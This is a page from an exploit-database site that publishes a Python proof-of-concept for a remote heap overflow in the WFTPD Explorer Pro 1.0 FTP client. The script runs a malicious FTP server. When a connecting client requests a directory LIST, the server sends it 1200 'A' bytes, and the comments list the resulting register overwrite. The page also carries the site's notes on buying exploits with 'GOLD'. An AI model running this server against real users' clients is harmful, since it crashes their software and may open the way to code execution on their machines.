0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WFTPD Explorer Pro 1.0 Remote Heap Overflow PoC
=============================================== WFTPD Explorer Pro 1.0 Remote Heap Overflow PoC =============================================== ########################################## # WftpdExpPro_HeapPoC.py # # Discovered by r4x (Kamil Szczerba) # # [r4xks@o2.pl] # ########################################## # Soft : WFTPD Explorer Pro 1.0 # # Vendor : Texas Imperial Software # # Vuln : Heap Overwlow (Res: LIST) # # Exploit : PoC Reg Overwrite # ########################################## # Reg: # # EAX = 41414141 # # ECX = 41414141 # # EDX = 00a57b38 ASCII "AAAA..." # # ESI = 00a57b30 ASCII "AAAA..." # # ------------------------------ # # EIP = 7c91142E # # # # Exception c0000005 (ACCES_VIOLATION) # # # # MOV DWORD PTR DS:[ECX],EAX ; HEHE # # MOV DWORD PTR DS:[EAX +4] ECX ; # # # # Test on: WinXPsp2 Polish # # # ########################################## from socket import * heapb0f = "A" * 1200 + "r\n" req = ( "USER", "PASS", "TYPE", "PWD", "PASV", "LIST" ) res = ( "331 Password required.\r\n", "230 User logged in.\r\n", "200 Type set to I.\r\n", "257 '/' is current directory.\r\n", "227 Entering Passive Mode (127,0,0,1,100,100).\r\n", "150 Opening ASCII mode data connection for file list.\r\n", ) def parser(buff): cmd = buff.split("\x20")[0] cmd1 = buff.split("\r\n")[0] if len(cmd) > len(cmd1): cmd = cmd1 for i in range(len(req)): if req[i] == cmd: return res[i] def multiserv(port1, port2): control = socket(AF_INET, SOCK_STREAM) control.bind(('', port1)) control.listen(1) trans = socket(AF_INET, SOCK_STREAM) trans.bind(('', port2)) trans.listen(1) while(1): cclient, caddr = control.accept() print "[*] Connected: ", caddr cclient.send("220 Welcome: Evil Secure FTPD 1.666\r\n") while(1): r0 = cclient.recv(1024) print "[>] Input: %s" % (r0) r1 = parser(r0) if r1 == None: r1 = "502 Command not implemented.\r\n" cclient.send(r1) print "[<] Output: %s" % (r1) if r1 == res[4]: print "[*] Data mode\n" tclient, taddr = trans.accept() print "[*] Connected: ", taddr if r1 == res[5]: print "[*] b00mb!" tclient.send(heapb0f) print "[*] done" break break multiserv(21, 25700) # 0day.today [2024-07-02] #